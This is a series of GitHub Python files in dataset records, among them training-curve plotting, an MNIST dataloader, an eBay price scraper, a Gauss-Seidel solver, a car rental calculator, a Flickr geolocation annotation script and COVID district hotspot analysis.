f\"{args.model}_sad_{args.split_type}_{idx_str}\"\n model_names.append(name)\n\n return model_names\n\ndef parse_number_list(game_seeds):\n if '-' in game_seeds:\n seed_range = [int(x) for x in game_seeds.split('-')]\n assert(len(seed_range) == 2)\n game_seed_list = list(np.arange(*seed_range))\n else:\n 
game_seed_list = [int(x) for x in game_seeds.split(',')]\n\n return game_seed_list\n\n\ndef load_data(args, model_names):\n all_data = {}\n\n all_model_data = []\n\n for name in model_names:\n load_path = os.path.join(LOAD_DIR, name + \".csv\")\n data = genfromtxt(load_path, delimiter=',')\n data = np.delete(data, 0, axis=0)\n\n all_model_data.append(data)\n\n mean_data = np.mean(all_model_data, axis=0)\n sem_data = np.std(all_model_data, axis=0) / np.sqrt(len(all_model_data))\n print(\"mean data:\", mean_data.shape)\n print(mean_data)\n print(\"sem data:\", sem_data.shape)\n print(sem_data)\n\n # for i, word in enumerate([\"test\", \"train\"]):\n for i, dataset in enumerate([\"test\", \"train\"]):\n mean = mean_data[:, i]\n stderr_high = mean + sem_data[:, i]\n stderr_low = mean - sem_data[:, i]\n\n all_data[f\"{dataset}_mean\"] = mean\n all_data[dataset + \"_stderr_high\"] = stderr_high\n all_data[dataset + \"_stderr_low\"] = stderr_low\n\n return all_data\n\n\ndef plot_data(args, data):\n epochs = np.arange(0, args.num_samples)\n\n test_idx = 0\n train_idx = 1\n\n datasets = []\n if args.test:\n datasets.append(\"test\")\n if args.train:\n datasets.append(\"train\")\n colours = {\"train\": \"blue\", \"test\": \"green\"}\n\n for dataset in datasets:\n mean = data[f\"{dataset}_mean\"]\n stderr_high = data[f\"{dataset}_stderr_high\"]\n stderr_low = data[f\"{dataset}_stderr_low\"]\n \n plt.plot(epochs, mean, label=dataset, color=colours[dataset])\n plt.fill_between(epochs, stderr_high, stderr_low, \n alpha=0.3, color=colours[dataset])\n\n split_name = SPLIT_NAME[args.split_type]\n plt.title(f\"{args.model.upper()} Training Curves, {split_name}\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Score\")\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndef load_json_list(path):\n if path == \"None\":\n return []\n file = open(path)\n return json.load(file)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, default=\"br\")\n parser.add_argument(\"--splits\", type=str, default=\"0\")\n parser.add_argument(\"--split_type\", type=str, default=\"six\")\n parser.add_argument(\"--num_samples\", type=int, default=1000)\n parser.add_argument('--test', type=int, default=1)\n parser.add_argument('--train', type=int, default=1)\n parser.parse_args()\n args = parser.parse_args()\n\n plot_mean_logs(args)\n\n","repo_name":"ravihammond/symmetry-breaking-augmentations","sub_path":"pyhanabi/plot_mean_logs.py","file_name":"plot_mean_logs.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14154845097","text":"import torch\nfrom torch.utils.data.sampler import SubsetRandomSampler as sps\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\nimport numpy as np\n\n\ndef getdataloader(args):\n # Define the transformet to be used on the data\n transform = transforms.Compose([transforms.ToTensor(),transforms.Normalize((0.5,), (0.5,)),])\n\n # Get the data and use the transformations on them\n train_data = datasets.MNIST('data', train=True, download=True, transform=transform)\n test_data = datasets.MNIST('data', train=False, download=True, transform=transform)\n\n # Split the data in to test and train sets\n indices = np.arange(len(train_data))\n train_indeces = np.random.choice(indices, int(0.8*len(indices)), replace=False)\n test_indeces = np.array(list(set(indices) - set(train_indeces)))\n\n # Create a sampler to sample from the 
sets\n train_sampler = sps(train_indeces)\n valid_sampler = sps(test_indeces)\n\n # Create loaders to retrieve data in batches\n train_loader = DataLoader(train_data, batch_size = args.batch_size, sampler=train_sampler)\n val_loader = DataLoader(train_data, batch_size = args.batch_size, sampler=valid_sampler)\n test_loader = DataLoader(test_data, batch_size = args.batch_size)\n\n return train_loader, val_loader, test_loader","repo_name":"hkjit/cs520-ml-toolkits","sub_path":"image_classification/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20007010038","text":"from lxml import html\nimport requests\nimport csv\nfrom traceback import format_exc\nimport re\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom numpy import mean\n\nurl = \"https://www.ebay.com/sch/Portable-Audio-Headphones/15052/i.html?_udlo=50&_udhi=310&_mPrRngCbx=1&LH_Complete=1&_sop=13&_nkw=sony+wh-1000xm2&_ipg=200&rt=nc\"\nbrand = \"sony wh-1000xm2\"\nregex = re.compile(\"[0-9.]+\")\n\n\ndef parse(url):\n scraped_products = []\n for i in range(1, 4):\n try:\n # url = 'http://www.ebay.com/sch/i.html?_nkw={0}&_sacat=0'.format(brand)\n url += \"&_pgn={}\".format(str(i))\n print(\"Retrieving {}\".format(url))\n response = requests.get(url)\n print(\"Parsing page\")\n parser = html.fromstring(response.text)\n product_listings = parser.xpath('//li[contains(@class,\"lvresult\")]')\n raw_result_count = parser.xpath(\"//span[@class='rcnt']//text()\")\n result_count = ''.join(raw_result_count).strip()\n print(\"Found {0} results for {1}\".format(result_count, brand))\n\n for product in product_listings:\n # // shortcuts to specific class\n # use //header[@class=\"class\"]\n # or //header[contains(@class, 'class')]\n # first period dot limits to nth (target) instance\n raw_url = product.xpath(\"//a[@class='vip']/@href\")\n raw_title = product.xpath(\".//a[@class='vip']/text()\")\n raw_status = product.xpath(\".//div[@class='lvsubtitle']/text()\")\n raw_date = product.xpath(\".//span[@class='tme']/span/text()\")\n raw_price = product.xpath(\".//li[@class='lvprice prc']/span/text()\")\n raw_shipping = product.xpath(\".//span[@class='ship']/span/text()\")\n raw_shipping = product.xpath(\".//span[@class='fee']/text()\")\n\n title = ' '.join(' '.join(raw_title).split())\n status = ' '.join(' '.join(raw_status).split())\n price = ' '.join(' '.join(raw_price).split())\n # skip item if it has no price\n if len(price) < 2:\n continue\n price = float(price.strip('$'))\n\n shipping = ' '.join(' '.join(raw_shipping).split())\n if len(shipping) > 0:\n shipping = float(str(re.findall(regex, shipping)[0]))\n else:\n shipping = 0.0\n\n data = {\n 'url': raw_url[0],\n 'title': title,\n 'status': status,\n 'date': raw_date,\n 'price': price,\n 'shipping': shipping,\n 'total_price': price + shipping\n }\n scraped_products.append(data)\n except Exception as e:\n print(format_exc(e))\n return scraped_products\n\n\nscrape_list = parse(url)\nprint(\"\\n{}\\n\".format(scrape_list[7]))\n\nstatus_list = [\"Brand New\", \"Pre-Owned\"]\nstatus_dict = {}\n\nfor status in status_list:\n status_n_list = []\n for data in scrape_list:\n if data[\"status\"] == status:\n status_n_list.append(data[\"total_price\"])\n status_dict[status] = status_n_list\n print(\"\\n{} Average: {:.2f}\".format(status, mean(status_n_list)))\n\nfor subdict in status_dict:\n # print(subdict)\n price_list = status_dict[subdict]\n 
plt.figure(subdict)\n plt.hist(price_list)\nplt.show()\n\nwith open('{}-ebay-scraped-data.csv'.format(brand), 'w', encoding='utf-8') as csvfile:\n fieldnames = [\"date\", \"title\", \"status\", \"total_price\", \"price\", \"shipping\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, extrasaction='ignore',\n quoting=csv.QUOTE_ALL, lineterminator='\\n')\n writer.writeheader()\n for data in scrape_list:\n writer.writerow(data)\n","repo_name":"gnomieowns/ebay-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71332751112","text":"#구간합\narr = [0, 1, 2, 3, 4]\nN = len(arr)\n\nfor split_1 in range(1, N-1): #N-2까지 갈 수 있음?\n sum_sec1 = 0\n for num1 in range(0,split_1):\n sum_sec1 += arr[num1]\n sum_sec2 = 0\n for num_2 in range(num1 +1, N-1):\n sum_sec2 += arr[num_2]\n sum_sec3 = 0\n for num_3 in range(num_2 + 1, N):\n sum_sec3 += arr[num_3]\n sum_lst = [sum_sec1, sum_sec2, sum_sec3]\n print(sum_lst)\n\n","repo_name":"S4lTYD0G/TIL","sub_path":"0825/arr_test.py","file_name":"arr_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11918519053","text":"import math\n\n# Checks if Gauss-Seidel method is applicable\ndef ValidatesMatrix(A):\n coefficient = []\n for i in range(len(A)):\n b = 0\n for j in range(len(A)):\n if (i != j and i == 0) or i < j:\n b += A[i][j]\n elif i != j and i != 0:\n b += A[i][j]*coefficient[j]\n b /= A[i][i]\n coefficient.append(b)\n if max(coefficient) > 1:\n print('Gauss-Seidel method is not applicable!')\n return 0\n else:\n return 1\n\n# Finds the highest difference between current and previous solution\n\n\ndef difference(previous, current):\n difference = []\n for i in range(len(previous)):\n Diff = abs(current[i] - previous[i])\n difference.append(Diff)\n return max(difference)\n\n\ndef GaussSeidel(A, B, current_solutions, number_of_iterations, error):\n if ValidatesMatrix(A):\n for i in range(number_of_iterations):\n previous = []\n for xn in current_solutions:\n previous.append(xn)\n\n for j in range(len(A)):\n x = B[j]\n for k in range(len(A)):\n if j != k:\n x -= A[j][k]*current_solutions[k]\n x /= A[j][j]\n current_solutions[j] = x\n\n print(\"Iteration\", i+1, \"-\", end=\"\")\n resp = \"\"\n for solution in current_solutions:\n resp += ' ' + str(solution)\n print(resp)\n\n # Checks if difference has reached acceptable precision\n if difference(previous, current_solutions) < error:\n print(\"Max precision reached!\")\n break\n\n\n# Example\nA = [\n [12, 3, -5],\n [1, 5, 3],\n [3, 7, 13]\n]\nB = [1, 28, 76]\n\ninitial_guess = [1, 0, 1]\nnumber_of_iterations = 20\nerror = 0.00000001\n\n# Execution\nprint(\"----- Gauss-Seidel Method-----\")\nGaussSeidel(A, B, initial_guess, number_of_iterations, error)\n","repo_name":"luamz/numerical-methods","sub_path":"gauss-seidel.py","file_name":"gauss-seidel.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70962216072","text":"def string_to_ascii(value):\n \"\"\"\n Not the best method name, but you can copy the value from a key in Wireshark\n And use this method to get the same value to use for Scapy.\n :param value:\n :return:\n \"\"\"\n n = 2\n\n try:\n # Per two convert to hex\n value_per_two_characters = [value[i:i + n] for i in range(0, 
\n n = 2\n\n try:\n # Per two convert to hex\n value_per_two_characters = [value[i:i + n] for i in range(0, len(value), n)]\n # from hex convert to ascii\n ascii_values = [int(x, 16) for x in value_per_two_characters]\n\n # use ascii string\n converted_ascii_values = [chr(x) for x in ascii_values]\n\n # join to one string\n output = \"\".join(converted_ascii_values)\n return output\n except Exception:\n return \"\"\n","repo_name":"aredev/quic-scapy","sub_path":"util/string_to_ascii.py","file_name":"string_to_ascii.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"74500079750","text":"import sys\n'''\nSection 1: Collect customer input\n'''\n#Prompt the user for rentalCode (B)udget, (D)aily, or (W)eekly rental?\n#Example of using variable for an input string value.\nrentalCode = input (\"(B)udget, (D)aily, or (W)eekly rental?\\n\")\n\n#Used a branch to determine whether the rental period is days rented or weeks rented.\n#Example of using a branch.\nif rentalCode == 'B' or rentalCode == 'D':\n daysRented = int(input(\"Number of Days Rented:\\n\"))\nelse:\n weeksRented = int(input(\"Number of Weeks Rented:\\n\"))\n #Convert weeks to days so the mileage calculations below also work for weekly rentals.\n daysRented = weeksRented * 7\nprint (rentalCode)\nif rentalCode == 'B' or rentalCode == 'D':\n print (daysRented)\nelse:\n print (weeksRented)\n\n#Assigned budget_Charge, daily_Charge, and weekly_Charge to a numerical value.\n#Example of assigning variables with numerical values.\nbudget_Charge = 40.00\ndaily_Charge = 60.00\nweekly_Charge = 190.00\n\n#Example of using a branch.\n#Example of changing a variable baseCharge with a math operator *.\nif rentalCode == 'B':\n baseCharge= daysRented * 40.00\nelif rentalCode == 'D':\n baseCharge=daysRented * 60.00\nelif rentalCode == 'W':\n baseCharge=weeksRented * 190.00\n#Printed the baseCharge value.\nprint (\"%.2f\" % (baseCharge))\n#Used a branch to modify variables with the * operator depending on the rental period.\n#Example of using a conditional statement to change the value of the baseCharge variable.\n\n#Assigned odoStart and odoEnd to an input string value. \nodoStart = input (\"Starting Odometer Reading:\\n\")\nodoEnd = input (\"Ending Odometer Reading:\\n\")\n\n#Assigned variable totalMiles to integer values of odoEnd minus odoStart.\n#For finding the total amount of miles.\ntotalMiles = int(odoEnd) - int(odoStart)\n\n#Printed each value odoStart, odoEnd, and totalMiles.\nprint (odoStart)\nprint (odoEnd)\nprint (totalMiles)\n\n#Set mileCharge to total miles *.25: the extraMiles charge\n#Used to find extra cost of extraMiles\nmileCharge = totalMiles *.25\n\n#Calculated averagedailymiles to use for extra miles.\naveragedailymiles = int(totalMiles)/ int(daysRented)\n\n#Used a conditional branch statement to determine the extra cost for totalMiles. \n#Used for days rented.\nif rentalCode == 'B':\n mileCharge = 0.25 * totalMiles\nif rentalCode == \"D\":\n if averagedailymiles <= 100:\n totalMiles = 0\n elif averagedailymiles > 100:\n extraMiles = averagedailymiles - 100\n mileCharge = .25 * extraMiles\n\n#Used for weeks rented.\nif rentalCode == \"W\" and averagedailymiles > 900:\n mileCharge = daysRented * 100\nelif rentalCode == \"W\" and averagedailymiles <= 900:\n mileCharge = 0\n#Printed mileCharge value.\nprint (\"%.2f\" %(mileCharge))\n\n#Found the amount due by adding the base charge with the mile charge.
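\n#Example: a Budget rental for 3 days with 360 miles gives baseCharge = 3 * 40.00 = 120.00, mileCharge = 0.25 * 360 = 90.00, and amtDue = 210.00.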
\namtDue = float(baseCharge) +float(mileCharge)\n\n#Printed the rental summary which included the string variables and their values.\nprint ('Rental Summary')\nprint ('Rental Code:' +str(rentalCode))\nprint ('Rental Period:' +str(daysRented))\nprint ('Starting Odometer:' +str(odoStart))\nprint ('Ending Odometer:' +str(odoEnd))\nprint ('Miles Driven:' +str(totalMiles))\nprint ('Amount Due:' +'$' +'%.2f' %(amtDue))","repo_name":"HamirA2/Projects","sub_path":"rental_car.py","file_name":"rental_car.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38421268028","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @FileName :002_urllib的一个类型和六个方法.py\n# @Time :2023/2/26 22:45\n# @Author :周万宁\n\n\nif __name__ == \"__main__\":\n run_code = 0\n\nimport urllib.request\n\n\nurl = 'http://www.baidu.com'\n\n# Simulate a browser sending a request to the server\nresponse = urllib.request.urlopen(url)\n\n# One type and six methods\n# response is of type HTTPResponse\n# print(type(response)) # <class 'http.client.HTTPResponse'>\n\n# Read the response byte by byte\n# content = response.read()\n# print(content)\n\n# Read back the given number of bytes\n# content = response.read(5)\n# print(content)\n\n# Read a single line\n# content = response.readline()\n# print(content)\n\n# Return the status code; if it is 200, our logic is correct\n# print(response.getcode())\n\n# Return the URL\n# print(response.geturl())\n\n# Get the response status/header information\nprint(response.getheaders())\n\n# One type: HTTPResponse\n# Six methods: read readline readlines getcode geturl getheaders\n\n","repo_name":"WanNing-Zhou/newpyProject","sub_path":"python爬虫/002_urllib的一个类型和六个方法.py","file_name":"002_urllib的一个类型和六个方法.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19978940068","text":"import matplotlib.pyplot as plt\nimport os\nfrom numpy import genfromtxt\nimport scipy.io\n\nmat = scipy.io.loadmat('Ca_Mg_Na_js_distance_cond_old.mat')\n\njs_distance_matrix = mat['js_cell']\n\ntry: \n os.mkdir('Js_distances_matrix_image')\nexcept OSError as error: \n print(error)\n\n\nconditions = range(65, 65+9)\nfor i in conditions:\n\tjs_matrix = js_distance_matrix[i-65][0]\n\n\tfig1, ax1 = plt.subplots(figsize=(10,5))\n\tc = ax1.pcolor(js_matrix,cmap=\"Blues\")\n\tax1.set_ylim(ax1.get_ylim()[::-1])\n\n\tplt.title(\"Jensen-Shannon distance between nanochromatography images under condition \" + chr(i))\n\n\tax1.xaxis.set_ticks_position('top')\n\tax1.xaxis.set_label_position('top')\n\n\tticks = list(range(0, 76, 15))\n\tax1.set_xticks(ticks)\n\tticklabels = []\n\tfor ele in ticks:\n\t\tticklabels.append('Img ' + str(ele))\n\n\tax1.set_xticklabels(ticklabels)\n\n\tax1.set_yticks(ticks)\n\tax1.set_yticklabels(ticklabels)\n\n\tax1.set_xlabel('Water sample nanochromatography images')\n\tax1.set_ylabel('Water sample nanochromatography images')\n\tax1.set_aspect('equal')\n\tplt.colorbar(c,ax=ax1)\n\tfilename = 'Js_distances_matrix_image/' + chr(i) + '_js_Ca_Mg_Na_distance.png'\n\n\tplt.savefig(filename, bbox_inches='tight', dpi = 600)","repo_name":"xiaoyanLi629/coffee-ring-effect-method-optimization","sub_path":"Nanochromatography_cropped/Feature analysis/7_EDS_element_distribution_distance_analysis/js_distance_plot.py","file_name":"js_distance_plot.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38163622416","text":"import urllib\nimport json\n\n# Reads the places metadata from YFCC100M\n# Selects only the images with places metadata (48M)\n# Use flickr API to get the GPS coordinates of the towns.\n# Stores the image and location information in a txt file in the following format:\n# id;[tag1,tag2,...];country;town;latitude;longitude;url
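\n# e.g. 123456;[beach,sunset];Spain;Barcelona;41.38;2.17;http://example.com/photo.jpg (illustrative values only)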
\n\n\nout_file = open(\"../../../ssd2/YFCC100M/anns_geo_gombru.txt\",'w')\n\nkey = \"71542c171848da257b3caa214f7ed00f\"\n\nprint(\"Getting places metadata\")\nplaces_file = open(\"../../../ssd2/YFCC100M/yfcc100m_places\")\nplaces_metadata = {}\nnum_countries = 0\nnum_towns = 0\n\ngeo_info = {}\n\nc = 0\nfor line in places_file:\n c+=1\n if c%200000 == 0: print(c)\n # if c == 10: break\n metadata = line.split(',')\n if len(metadata) < 2:\n continue # No geolocation info\n country = \"\"\n town = \"\"\n town_id = 0\n\n id = int(metadata[0].split('\\t')[0])\n metadata[0] = metadata[0].split('\\t')[1]\n for field in metadata:\n if \"Country\" in field:\n country = field.split(':')[1]\n country_id = int(field.split(':')[0])\n elif \"Town\" in field:\n town = field.split(':')[1]\n town_id = int(field.split(':')[0])\n\n if country != \"\": num_countries+=1\n if town != \"\": num_towns+=1\n\n if town_id == 0: continue\n\n # Query GPS coords to Flickr\n if town_id not in geo_info:\n try:\n print(town)\n query_api_url = \"https://api.flickr.com/services/rest/?method=flickr.places.getInfo&api_key=\"+key+\"&woe_id=\"+str(town_id)+\"&format=json&nojsoncallback=1\"\n response = urllib.urlopen(query_api_url)\n data = json.loads(response.read())\n latitude = float(data['place']['latitude'])\n longitude = float(data['place']['longitude'])\n geo_info[town_id] = {}\n geo_info[town_id]['lat'] = str(latitude)\n geo_info[town_id]['lon'] = str(longitude)\n except:\n print(\"Error getting geo info for town. Skipping sample\")\n continue\n\n # Has geolocation info\n places_metadata[id] = {}\n places_metadata[id]['town'] = town.replace(';',',')\n places_metadata[id]['town_id'] = town_id\n places_metadata[id]['country'] = country.replace(';',',')\n\n\nplaces_file.close()\n\nprint(\"Number of elements with geolocation found: \" + str(len(places_metadata)))\nprint(\"Number of elements with country found: \" + str(num_countries))\nprint(\"Number of elements with town found: \" + str(num_towns))\n\n\nprint(\"Getting images metadata\")\ndataset_file = open(\"../../../ssd2/YFCC100M/yfcc100m_dataset\")\nselected=0\n\nc = 0\nfor line in dataset_file:\n c+=1\n if c%2000000 == 0: print(c)\n # if c == 100000: break\n metadata = line.split('\\t')\n # print(metadata)\n id = int(metadata[1])\n if id not in places_metadata:\n continue # No geolocation info\n type = metadata[-2]\n if type != 'jpg' and type != 'jpeg' and type != 'png':\n continue # Is video\n url = metadata[-9].replace(';',',').replace('\\n', ' ').replace('\\r', '')\n tags = metadata[10].replace(';',',')\n if len(tags) < 3: continue # No tags\n\n # Image selected: Has geolocation info and tags\n town_id = places_metadata[id]['town_id']\n if town_id not in geo_info:\n continue # No GPS coordinates stored for this town\n selected+=1\n out_line = str(id) + ';' + tags + ';' + places_metadata[id]['country'] + ';' + places_metadata[id]['town'] + ';' + geo_info[town_id]['lat'] + ';'+ geo_info[town_id]['lon'] + ';' + url + '\\n'\n # print(out_line)\n out_file.write(out_line)\n\nprint(\"Selected number of images: \" + str(selected))\n\nout_file.close()\n\nprint(\"DONE\")","repo_name":"gombru/geoSemantics","sub_path":"dataset_code/build_anns_geolocation_old_bugged.py","file_name":"build_anns_geolocation_old_bugged.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16711076856","text":"import
 pandas as pd\nimport urllib, json\nimport csv\nimport datetime\nimport statistics \nimport collections\n\n#get weekly cases\n\nfields=['districtid','weekid','cases']\nweekdata=pd.read_csv('cases-week.csv',usecols=fields)\n\n\ncaselist=[]\nweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=int(weekdata.loc[(weekdata['weekid']==weekid) & (weekdata['districtid']==int(i)) ]['cases'])\n caselist.append(cases)\n \n weekdict[i]=caselist\n caselist=[]\n\n#get neighbor values\n\nfields=['districtid','weekid','neighbormean','neighborstdev']\nneighbordata=pd.read_csv('neighbor-week.csv',usecols=fields)\n\n\n#neighbour mean\nnmeanlist=[]\nnmeanweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(neighbordata.loc[(neighbordata['weekid']==weekid) & (neighbordata['districtid']==int(i)) ]['neighbormean'])\n nmeanlist.append(cases)\n \n nmeanweekdict[i]=nmeanlist\n nmeanlist=[]\n\n\n\n#neighbor std\nnstdlist=[]\nnstdweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(neighbordata.loc[(neighbordata['weekid']==weekid) & (neighbordata['districtid']==int(i)) ]['neighborstdev'])\n nstdlist.append(cases)\n \n nstdweekdict[i]=nstdlist\n nstdlist=[]\n\n#get state values\n\nfields=['districtid','weekid','statemean','statestdev']\nstatedata=pd.read_csv('state-week.csv',usecols=fields)\n\n\n#state mean\nsmeanlist=[]\nsmeanweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(statedata.loc[(statedata['weekid']==weekid) & (statedata['districtid']==int(i)) ]['statemean'])\n smeanlist.append(cases)\n \n smeanweekdict[i]=smeanlist\n smeanlist=[]\n\n\n\n#state std\nsstdlist=[]\nsstdweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(statedata.loc[(statedata['weekid']==weekid) & (statedata['districtid']==int(i)) ]['statestdev'])\n sstdlist.append(cases)\n \n sstdweekdict[i]=sstdlist\n sstdlist=[]\n\n#actual logic\n\n#creating zscore csv\nweekdict = collections.OrderedDict(sorted(weekdict.items()))\nnmeanweekdict = collections.OrderedDict(sorted(nmeanweekdict.items()))\nnstdweekdict = collections.OrderedDict(sorted(nstdweekdict.items()))\nsmeanweekdict = collections.OrderedDict(sorted(smeanweekdict.items()))\nsstdweekdict = collections.OrderedDict(sorted(sstdweekdict.items()))\n\n\n\n#len(sstdweekdict[101])\n\nnhspwk=dict()\nncspwk=dict()\nshspwk=dict()\nscspwk=dict()\nfor (k,wkc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(weekdict.items(),nmeanweekdict.items(),nstdweekdict.items(),smeanweekdict.items(),sstdweekdict.items()):\n for weekid in range(25):\n if wkc[weekid]>(nm[weekid]+ns[weekid]):\n nhspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]<(nm[weekid]-ns[weekid]):\n ncspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]>(sm[weekid]+ss[weekid]):\n shspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]<(sm[weekid]-ss[weekid]):\n scspwk.setdefault(weekid,[]).append(k)\n\n#write to csv file\n\nwith open('method-spot-week.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['weekid','method','spot','districtid'])\n\n for wkid in range(25):\n if wkid in nhspwk.keys():\n for v in nhspwk[wkid]:\n csv_writer.writerow([wkid+1,'neighborhood','hot',v])\n if wkid in ncspwk.keys():\n for v1 in ncspwk[wkid]:\n csv_writer.writerow([wkid+1,'neighborhood','cold',v1])\n if wkid in shspwk.keys():\n for v2 in shspwk[wkid]:\n csv_writer.writerow([wkid+1,'state','hot',v2])\n if wkid in scspwk.keys():\n for v3 in scspwk[wkid]:\n
 csv_writer.writerow([wkid+1,'state','cold',v3])\n\n\n\n\n\n\n\n#month\nfields=['districtid','monthid','cases']\nmonthdata=pd.read_csv('cases-month.csv',usecols=fields)\n\n\nmcaselist=[]\nmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n mcases=int(monthdata.loc[(monthdata['monthid']==monthid) & (monthdata['districtid']==int(i)) ]['cases'])\n mcaselist.append(mcases)\n \n monthdict[i]=mcaselist\n mcaselist=[]\n\nfields=['districtid','monthid','neighbormean','neighborstdev']\nmneighbordata=pd.read_csv('neighbor-month.csv',usecols=fields)\n\n\n#neighbour mean\nnmmeanlist=[]\nnmmeanmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n nmcases=float(mneighbordata.loc[(mneighbordata['monthid']==monthid) & (mneighbordata['districtid']==int(i)) ]['neighbormean'])\n nmmeanlist.append(nmcases)\n \n nmmeanmonthdict[i]=nmmeanlist\n nmmeanlist=[]\n\n#neighbor std\nnmstdlist=[]\nnmstdmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n nscases=float(mneighbordata.loc[(mneighbordata['monthid']==monthid) & (mneighbordata['districtid']==int(i)) ]['neighborstdev'])\n nmstdlist.append(nscases)\n \n nmstdmonthdict[i]=nmstdlist\n nmstdlist=[]\n\nfields=['districtid','monthid','statemean','statestdev']\nmstatedata=pd.read_csv('state-month.csv',usecols=fields)\n\n\n#state mean\nsmmeanlist=[]\nsmmeanmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n smcases=float(mstatedata.loc[(mstatedata['monthid']==monthid) & (mstatedata['districtid']==int(i)) ]['statemean'])\n smmeanlist.append(smcases)\n \n smmeanmonthdict[i]=smmeanlist\n smmeanlist=[]\n\n#state std\nsmstdlist=[]\nsmstdmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n smcases=float(mstatedata.loc[(mstatedata['monthid']==monthid) & (mstatedata['districtid']==int(i)) ]['statestdev'])\n smstdlist.append(smcases)\n \n smstdmonthdict[i]=smstdlist\n smstdlist=[]\n\n#creating zscore csv\nmonthdict = collections.OrderedDict(sorted(monthdict.items()))\nnmmeanmonthdict = collections.OrderedDict(sorted(nmmeanmonthdict.items()))\nnmstdmonthdict = collections.OrderedDict(sorted(nmstdmonthdict.items()))\nsmmeanmonthdict = collections.OrderedDict(sorted(smmeanmonthdict.items()))\nsmstdmonthdict = collections.OrderedDict(sorted(smstdmonthdict.items()))\n\n\n\nnhspmn=dict()\nncspmn=dict()\nshspmn=dict()\nscspmn=dict()\nfor (k,mnc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(monthdict.items(),nmmeanmonthdict.items(),nmstdmonthdict.items(),smmeanmonthdict.items(),smstdmonthdict.items()):\n for monthid in range(7):\n if mnc[monthid]>(nm[monthid]+ns[monthid]):\n nhspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]<(nm[monthid]-ns[monthid]):\n ncspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]>(sm[monthid]+ss[monthid]):\n shspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]<(sm[monthid]-ss[monthid]):\n scspmn.setdefault(monthid,[]).append(k)\n\nwith open('method-spot-month.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['monthid','method','spot','districtid'])\n\n for mnid in range(7):\n if mnid in nhspmn.keys():\n for v in nhspmn[mnid]:\n csv_writer.writerow([mnid+1,'neighborhood','hot',v])\n if mnid in ncspmn.keys():\n for v1 in ncspmn[mnid]:\n csv_writer.writerow([mnid+1,'neighborhood','cold',v1])\n if mnid in shspmn.keys():\n for v2 in shspmn[mnid]:\n csv_writer.writerow([mnid+1,'state','hot',v2])\n if mnid in scspmn.keys():\n for v3 in scspmn[mnid]:\n
 csv_writer.writerow([mnid+1,'state','cold',v3])\n\n\n\n#overall\nfields=['districtid','overallid','cases']\noveralldata=pd.read_csv('cases-overall.csv',usecols=fields)\n\n\nocaselist=[]\noveralldict={}\nfor i in range(101,728):\n \n ocases=int(overalldata.loc[(overalldata['overallid']==1) & (overalldata['districtid']==int(i)) ]['cases'])\n ocaselist.append(ocases)\n \n overalldict[i]=ocaselist\n ocaselist=[]\n\nfields=['districtid','overallid','neighbormean','neighborstdev']\noneighbordata=pd.read_csv('neighbor-overall.csv',usecols=fields)\n\n\n#neighbour mean\nnomeanlist=[]\nnomeanoveralldict={}\nfor i in range(101,728):\n \n nocases=float(oneighbordata.loc[(oneighbordata['overallid']==1) & (oneighbordata['districtid']==int(i)) ]['neighbormean'])\n nomeanlist.append(nocases)\n \n nomeanoveralldict[i]=nomeanlist\n nomeanlist=[]\n\n#neighbor std\nnostdlist=[]\nnostdoveralldict={}\nfor i in range(101,728):\n \n noscases=float(oneighbordata.loc[(oneighbordata['overallid']==1) & (oneighbordata['districtid']==int(i)) ]['neighborstdev'])\n 